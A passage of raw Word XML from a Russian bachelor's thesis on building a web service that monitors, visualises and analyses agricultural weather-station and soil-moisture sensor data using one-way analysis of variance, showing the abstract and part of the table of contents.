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Pr="005A683C" w:rsidRDefault="0093378B" w:rsidP="00892905">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc136258103"/>
      <w:bookmarkStart w:id="1" w:name="_Toc136258398"/>
      <w:bookmarkStart w:id="2" w:name="_Toc136259020"/>
      <w:r w:rsidRPr="005A683C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rP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5E3A0E91" w:rsidR="0093378B" w:rsidRPr="004F5453" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Бакалаврская работа содержит </w:t>
      </w:r>
      <w:r w:rsidR="00295BB1" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidR="00295BB1" w:rsidRPr="00527702">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> страниц, </w:t>
      </w:r>
      <w:r w:rsidR="008F392E" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F73005" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> рисунк</w:t>
      </w:r>
      <w:r w:rsidR="008F392E" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F14744" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблиц, </w:t>
      </w:r>
      <w:r w:rsidR="008F392E" w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> источник.</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8ECFA3B"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007A3814">
        <w:t xml:space="preserve"> собранных данных</w:t>
      </w:r>
      <w:r w:rsidRPr="00464AEF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B81800A" w14:textId="77777777" w:rsidR="00AA0AC4" w:rsidRPr="00BD5112" w:rsidRDefault="00AA0AC4" w:rsidP="00AA0AC4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00464AEF">
        <w:t>Предметом исследования явля</w:t>
      </w:r>
      <w:r>
        <w:t>ются</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>методы обработки данных для проведения анализа, в частности, алгоритм однофакторного дисперсионного анализа</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5112">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6F7D66" w14:textId="3E11D756" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью выпускной квалификационной работы является </w:t>
      </w:r>
      <w:r w:rsidR="008A26DF">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>мониторинг,</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> визуализаци</w:t>
      </w:r>
      <w:r w:rsidR="008A26DF">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A26DF">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и анализ </w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>данных</w:t>
      </w:r>
      <w:r w:rsidR="008A26DF">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и наблюдений</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, полученных с автоматической цифровой метеостанции</w:t>
      </w:r>
      <w:r w:rsidRPr="004363A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>и почвенных датчиков-влагомеров</w:t>
      </w:r>
      <w:r w:rsidR="004177C2">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A26DF">
        <w:t>исследователями в сфере сельского хозяйства и агрономами дистанционно с помощью сети интернет</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Pr="005A683C" w:rsidRDefault="0093378B" w:rsidP="001C0E55">
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A683C">
        <w:rPr>
          <w:rStyle w:val="ac"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25263B2F" w14:textId="6AB725E9" w:rsidR="00CC2EBA"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709227" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>ВВЕДЕНИЕ</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709227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6B9453A" w14:textId="66AECDF6" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709228" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Цель работы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709228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CA1A307" w14:textId="424A0E28" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709229" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Задачи</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709229 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6FF81F07" w14:textId="4AB03C54" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709230" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>1 Использование информационных технологий и математических моделей для решения задач в сфере сельского хозяйства</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709230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1CCB476E" w14:textId="0211E07C" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709231" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.1</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разработки программы для проведения исследований данных</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709231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3D80126A" w14:textId="16D2DFE7" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709232" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.2</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использования дисперсионного анализа</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709232 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="754F42F9" w14:textId="204297A7" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709233" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1.3</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:sz w:val="22"/>
            <w:lang w:eastAsia="ru-RU"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Математическая модель дисперсионного анализа и непараметрические методы</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709233 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CC93BD2" w14:textId="25E0B081" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709234" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2 Обзор существующих решений</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709234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4F08E0BF" w14:textId="1CE5AD44" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709235" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.1 Агрономические веб-сервисы для работы с агроэкосистемой</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709235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22A2EA29" w14:textId="4DECF1D1" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709236" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2 Описание популярных статистических пакетов</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709236 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5EFDFA83" w14:textId="00B28E0C" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709237" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3 Выбор технологий для решения задачи</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709237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508068B4" w14:textId="45D707CC" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709238" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Технология программирования веб-сервера и графического пользовательского интерфейса</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709238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693D978E" w14:textId="0C13FA04" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709239" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4 Программирование веб-сервера, графического пользовательского интерфейса и базы данных</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc162709239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7AEC1E70" w14:textId="081C860D" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709240" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.1 Аппарат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0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4F58B88E" w14:textId="3A486D82" w:rsidR="00CC2EBA" w:rsidRDefault="00591A13">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc162709241" w:history="1">
        <w:r w:rsidR="00CC2EBA" w:rsidRPr="003B754B">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.2 Программ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1 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="00CC2EBA">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
